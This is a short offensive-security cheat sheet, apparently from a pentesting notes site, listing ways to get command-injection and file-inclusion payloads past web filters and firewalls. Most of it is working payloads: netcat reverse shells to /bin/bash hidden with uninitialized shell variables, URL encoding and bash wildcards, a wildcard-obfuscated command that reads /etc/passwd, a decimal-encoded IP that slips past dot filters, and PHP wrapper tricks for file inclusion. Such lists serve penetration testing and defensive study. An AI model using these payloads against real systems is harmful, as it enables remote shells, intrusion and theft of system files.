Web Filter Bypass
Payloads and Bypass Methods for Web Filtering
Use Uninitialized Shell Variables to Bypass Filters
Uninitialized shell variables can be used for bypassing web application firewalls (WAF). Example: bypassing a filter to execute a reverse shell - nc$u -e /bin$u/bash$u <ip> <port>
. If this doesn't work try adding spaces before and after the variable (note the +
's, this example is also URL encoded): nc+$u++-e+/bin$u/bash$u <ip> <port>
($u
in this case is a random attacker-picked variable that would hopefully be uninitialized on the target).
Use Wildcards to Bypass Filters
Bypass web filters by using bash wildcards:/???/?s
/?cmd=%2f???%2f??t%20%2f???%2fp??s??
will bypass...and execute every command that matches. such as /bin/cat /etc/apt
, and /bin/cat /etc/passwd
netcat firewall bypass: /???/n? -e /???/b??h 2130706433 1337
(/???/?c.??????????? -e /???/b??h 2130706433 1337
for nc traditional)
Use String Concatenation to Bypass Filters
Convert IP Address to Other Formats
It is still understood by most programs and languages when converted to other formats, such as decimal, and avoids .
character in filtered HTTP requests: 127.0.0.1 = 2130706433
Injecting IPs when .
is disallowed: convert dotted-decimal format to decimal value - ip2dh
LFI / RFI by Bypassing Filters Using Wrappers
From PayloadsAllTheThings php://filter/
has multiple ways to bypass PHP input filters ;These can be chained with |
or /
: zip, data, expect, input, phar; many more different wrappers to try!
Last updated